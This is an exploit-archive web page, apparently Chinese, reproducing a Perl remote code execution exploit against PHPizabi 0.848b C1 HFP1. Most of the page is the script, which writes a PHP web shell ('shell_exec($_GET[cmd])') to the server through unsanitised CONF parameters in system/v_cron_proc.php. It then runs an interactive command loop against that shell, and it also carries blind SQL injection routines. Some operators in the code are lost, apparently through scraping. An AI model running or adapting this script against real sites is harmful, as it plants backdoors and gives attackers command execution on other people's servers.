手机
当前位置:查字典教程网 >网络安全 >Exploit >PHPizabi 0.848b C1 HFP1 Remote Code Execution Exploit
PHPizabi 0.848b C1 HFP1 Remote Code Execution Exploit
摘要:#!/usr/bin/perl#inphex#PHPizabiv0.848bC1HFP1RemoteCodeExecution#http:/...

#!/usr/bin/perl

#inphex

#PHPizabi v0.848b C1 HFP1 Remote Code Execution

#http://www.dz-secure.com/tools/1/WebESploit.pl.txt

#if you are seeking for a partner to work on some project(s) just send an email inphex0 [ at ] gmail [ dot ] com

#system/v_cron_proc.php

# if (!function_exists("writeLogEntry")) {

# function writeLogEntry($data) {

# global $CONF;

#

# touch($CONF["CRON_LOGFILE"]);

#

# if ($handle = fopen($CONF["CRON_LOGFILE"], "a")) {

# fwrite($handle, "[".date($CONF["LOCALE_LONG_DATE_TIME"])."] $data n");

# fclose($handle);

# }

# }

# }

#

#

#writeLogEntry("Cron cycle started");

#writeLogEntry("Cron cycle ended");

########################################################

#overwritable:

#1.$CONF["CRON_LOGFILE"]

#2.$CONF["LOCALE_LONG_DATE_TIME"]

#

#date($CONF["LOCALE_LONG_DATE_TIME"]) ;

#solution:

#<?php

#echo date("a");

#?>

#returns: pm

#<?php

#echo date("a");

#?>

#returns: a

#seems logically eh?

#

#usage: perl ye.pl host /path/

#

## [C:]# perl ye.pl host /path/

## $[host]# id

## uid=63676(dswrealty) gid=888(vusers) groups=33(www-data)

#

use LWP::UserAgent;

use HTTP::Cookies;

use Switch;

$hy = shift;

$host_ = "http://".$hy;

$path_ = shift;

$port = 80; #default

$info{'info'} = {

"description" => [""],

"options" =>

{

"agent" => "",

"proxy" => "",

"default_headers" => [

["key","value"]],

"timeout" => 0,

"cookie" =>

{

"cookie" => [""],

},

},

"sending_options" =>

{

"host" => $host_,

"path" => $path_."system/v_cron_proc.php",

"port" => $port,

"method_a" => "REMOTE_CO(MMAND)/CODE EXECUTION",

"attack" =>

{

"CONF[CRON_LOGFILE]" => ["get","CONF[CRON_LOGFILE]","yeee.php"],

"CONF[LOCALE_LONG_DATE_TIME]" => ["get","CONF[LOCALE_LONG_DATE_TIME]","<?php echo shell_exec($_GET[cmd]);exit;?>"], #nice eh?:)

},

},

};

&start($info{'info'},222);

while () {

print "$[".$hy."]#";

$cmd = <STDIN>;chomp($cmd);

$info{'info'} = {

"description" => [""],

"options" =>

{

"agent" => "",

"proxy" => "",

"default_headers" => [

["key","value"]],

"timeout" => 0,

"cookie" =>

{

"cookie" => [""],

},

},

"sending_options" =>

{

"host" => $host_,

"path" => $path_."system/yeee.php",

"port" => $port,

"method_a" => "REMOTE_CO(MMAND)/CODE EXECUTION",

"attack" =>

{

"CONF[CRON_LOGFILE]" => ["get","cmd",$cmd],

},

},

};

&start($info{'info'},221);

print ${$info{'info'}}{221}{'content'}."n";

}

sub start

{

$a_ = shift;

$id = shift;

$post_dA = "";

$get_dA = get_d_p_s("get");

$post_dA = get_d_p_s("post");

my ($x,$c,$m,$h,$ff,$kf,$hp,$c,$cccc) = (0,0,0,0,0,0,0,0,0);

$jj = 1;

$ii = 48;

$hh = 1;

$ppp = 0;

$s = shift;

$a = "";

$res_p = "";

$h = "";

$ua= "";

$agent= "";

$k= "";

$v= "";

$get_data= "";

$post_data= "";

$header_dA = "";

$h_host_h_xdsjaop = $a_->{'sending_options'}{'host'};

$h_path_h_xdsjaop = $a_->{'sending_options'}{'path'};

$h_port_h_xdsjaop = $a_->{'sending_options'}{'port'};

$method_m = $a_->{'sending_options'}{'method_a'};

$ua = LWP::UserAgent->new;

$ua->timeout($a_->{'options'}{'timeout'});

if ($a_->{'options'}{'proxy'}) {

$ua->proxy(['http', 'ftp'] => $a_->{'options'}{'proxy'});

}

$agent = $a_->{'options'}{'agent'} || "Mozilla/5.0";

$ua->agent($agent);

{

while (($k,$v) = each(%{$a_}))

{

if ($k ne "options" && $k ne "sending_options")

{

foreach $r (@{$a_->{$k}})

{

print $a_->{$k}[0];

}

}

}

foreach $j (@{$a_->{'options'}{'default_headers'}})

{

$ua->default_headers->push_header($a_->{'options'}{'default_headers'}[$m][0] => $a_->{'options'}{'default_headers'}[$m][1]);

$m ;

}

if ($a_->{'options'}{'cookie'}{'cookie'}[0])

{

$ua->default_headers->push_header('Cookie' => $a_->{'options'}{'cookie'}{'cookie'}[0]);

}

}

switch ($method_m)

{

case "attack" { &attack();}

case "SQL_INJECTION_BLIND" { &sql_injection_blind();}

case "REMOTE_COMMAND_EXECUTION" { &attack();}

case "REMOTE_CODE_EXECUTION" {&attack();}

case "REMOTE_FILE_INCLUSION" { &attack();}

case "LOCAL_FILE_INCLUSION" { &attack(); }

else { &attack(); }

}

sub attack

{

my ($jj);

my ($h);

my($x);

if ($post_dA eq "") {

$method = "get";

} elsif ($post_dA ne "")

{

$method = "post";

}

if ($method eq "get") {

$res_p = get_data($h_host_h_xdsjaop,$h_path_h_xdsjaop."?".$get_dA);

${$a_}{$id}{'content'} = $res_p;

foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})

{

$res_p =~ /$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/;

while ($jj <= $a_->{'sending_options'}{'attack'}{'regex'}[$h][1])

{

if (${$jj} ne "")

{

${$a_}{$id}{'regex'}[$h][$x] = ${$jj};

$x ;

}

$jj ;

}

$h ;

}

} elsif ($method eq "post")

{

$res_p = post_data($h_host_h_xdsjaop,$h_path_h_xdsjaop."?".$get_dA,"application/x-www-form-urlencoded",$post_dA);

${$a_}{$id}{'content'} = $res_p;

foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})

{

$res_p =~ /$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/;

while ($jj <= $a_->{'sending_options'}{'attack'}{'regex'}[$h][1])

{

if (${$jj} ne "")

{

${$a_}{$id}{'regex'}[$h][$x] = ${$jj};

$x ;

}

$jj ;

}

$h ;

}

}

}

sub sql_injection_blind

{

while ()

{

while ($ii <= 120)

{

$itsx = "[".chr($ii)."]";

$l = length($itsx);

$b = ("b")x$l;

syswrite STDOUT,$b.$itsx;

if(check($ii,$hh) == 1)

{

syswrite STDOUT,$b.chr($ii)."---";

$hh ;

$chr = $chr.chr($ii);

}

$ii ;

}

push(@ffs,length($chr));

if (($#ffs - 999) == $ffs)

{

exit;

}

$ii = 48;

}

}

sub check($$)

{

my ($h);

my ($a);

$ii = shift;

$hh = shift;

if (get_d_p_s("post") ne "")

{

$method = "post";

} else { $method = "get";}

if ($method eq "get")

{

$ppp ;

$query = modify($get_dA,$ii,$hh);

$res_p = get_data($h_host_h_xdsjaop,$a_->{'sending_options'}{'path'}."?".$query);

foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})

{

if ($res_p =~m/$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/)

{

if ($a_->{'sending_options'}{'attack'}{'regex'}[$h][2] == 1) {

return 1;

} else { return 0;}

}

else

{

if ($a_->{'sending_options'}{'attack'}{'regex'}[$h][2] == 1) {

return 0;

}else { return 1;}

}

$h ;

}

} elsif ($method eq "post")

{

$ppp ;

$query_g = modify($get_dA,$ii,$hh);

$query_p = modify($post_dA,$ii,$hh);

$res_p = post_data($h_host_h_xdsjaop,$a_->{'sending_options'}{'path'}."?".$query_g,"application/x-www-form-urlencoded",$query_p);

foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})

{

if ($res_p =~m/$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/)

{

return 1;

}

else

{

return 0;

}

$h ;

}

}

}

sub modify($$$)

{

$string = shift;

$replace_by = shift;

$replace_by1 = shift;

if ($string !~/$i/ && $string !~/$h/) {

return $string;

} elsif ($string !~/$i/)

{

$ff = substr($string,0,index($string,"$h"));

$ee = substr($string,rindex($string,"$h") 2);

$string = $ff.$replace_by1.$ee;

return $string;

} elsif ($string !~/$h/)

{

$f = substr($string,0,index($string,"$i"));

$e = substr($string,rindex($string,"$i") 2);

$string = $f.$replace_by.$e;

return $string;

} else

{

$f = substr($string,0,index($string,"$i"));

$e = substr($string,rindex($string,"$i") 2);

$string = $f.$replace_by.$e;

$ff = substr($string,0,index($string,"$h"));

$ee = substr($string,rindex($string,"$h") 2);

$string = $ff.$replace_by1.$ee;

return $string;

}

}

sub get_d_p_s

{

$k = 0;

$v = 0;

$g_d_p_s = shift;

@post = ();

@get = ();

$post_data = "";

$get_data = "";

$header_data = "";

%header_dA = ();

$p = "";

$g = "";

while (($k,$v) = each(%{$a_->{'sending_options'}{'attack'}}))

{

if ($a_->{'sending_options'}{'attack'}{$k}[0] =~/post/)

{

$p .= $a_->{'sending_options'}{'attack'}{$k}[1]."=".$a_->{'sending_options'}{'attack'}{$k}[2]."&";

} elsif ($a_->{'sending_options'}{'attack'}{$k}[0] =~/get/) {

$g .= $a_->{'sending_options'}{'attack'}{$k}[1]."=".$a_->{'sending_options'}{'attack'}{$k}[2]."&";

} elsif ($a_->{'sending_options'}{'attack'}{$k}[0] =~ "header")

{

$header_dA{$a_->{'sending_options'}{'attack'}{$k}[1]} = $a_->{'sending_options'}{'attack'}{$k}[2];

}

}

if ($g_d_p_s eq "get")

{

return $g;

}

elsif ($g_d_p_s eq "post")

{

return $p;

} elsif ($g_d_p_s eq "header")

{

return %header_dA;

}

@a_ = ();

}

sub get_data

{

$h_host_h_xdsjaop = shift;

$h_path_h_xdsjaop = shift;

%hash = get_d_p_s("header");

while (($u,$c) = each(%hash))

{

$ua->default_headers->push_header($u => $c);

}

$req = $ua->get($h_host_h_xdsjaop.":".$a_->{'sending_options'}{'port'}.$h_path_h_xdsjaop);

return $req->content;

}

sub post_data

{

$h_host_h_xdsjaop = shift;

$h_path_h_xdsjaop = shift;

$content_type = shift;

$send = shift;

%hash = get_d_p_s("header");

while (($u,$c) = each(%hash))

{

$ua->default_headers->push_header($u => $c);

}

$req = HTTP::Request->new(POST => $h_host_h_xdsjaop.":".$a_->{'sending_options'}{'port'}.$h_path_h_xdsjaop);

$req->content_type($content_type);

$req->content($send);

$res = $ua->request($req);

return $res->content;

}

}

【PHPizabi 0.848b C1 HFP1 Remote Code Execution Exploit】相关文章:

FlashGet 1.9.0.1012 (FTP PWD Response) BOF Exploit (safeseh)

fuzzylime cms 3.01 (polladd.php poll) Remote Code Execution Exploit (php)

Maian Gallery 2.0 Insecure Cookie Handling Vulnerability

Quicksilver Forums 1.4.1 forums[] Remote SQL Injection Exploit

TGS CMS 0.3.2r2 Remote Code Execution Exploit

Avlc Forum (vlc_forum.php id) Remote SQL Injection Vulnerability

Pars4U Videosharing V1 XSS / Remote Blind SQL Injection Exploit

Xerox Phaser 8400 (reboot) Remote Denial of Service Exploit

Debian Sarge Multiple IMAP Server Denial of Service Exploit

MojoClassifieds 2.0 Remote Blind SQL Injection Exploit

精品推荐
分类导航